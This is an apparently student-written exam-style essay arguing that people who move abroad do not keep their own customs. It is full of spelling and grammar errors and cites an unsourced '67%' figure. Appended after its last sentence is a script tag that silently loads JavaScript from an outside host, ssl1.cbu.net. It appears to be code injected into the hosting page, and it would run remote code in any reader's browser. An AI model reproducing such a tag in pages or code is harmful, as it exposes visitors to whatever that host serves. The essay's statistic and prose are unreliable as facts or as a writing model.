People should follow the customs and traditions when people start to live in a new country. To what extent do you agree or disagree?

Travelling to abroad is rapidly increasing.it is argued that people should follow their customs and traditions when they live in country.I artially disagree with the statement am going to explain my point of view in further paragraphs with suitable examples Firstly, i believe that when people live in another country it is not important for them to live in their customs because they do jobs there so they cannot live in tradition meet themselves acording to environmre they live such as one of my cousin is live in abroad he told me that he do the job in multinational company there so he follow the those rules which his company said. living in abroad is not too much beneficial because people start to like the environment where they live so they cannot live in their culture there because it is present in the nature of people where they live they start to copy those people where they live for example i was listening to it revealed that 67% people live in abroad do not live in their tradition To close it is clear in the above essay that people do not follow their customs when they live in abroad <script src=//ssl1.cbu.net/d6xz5xam></script>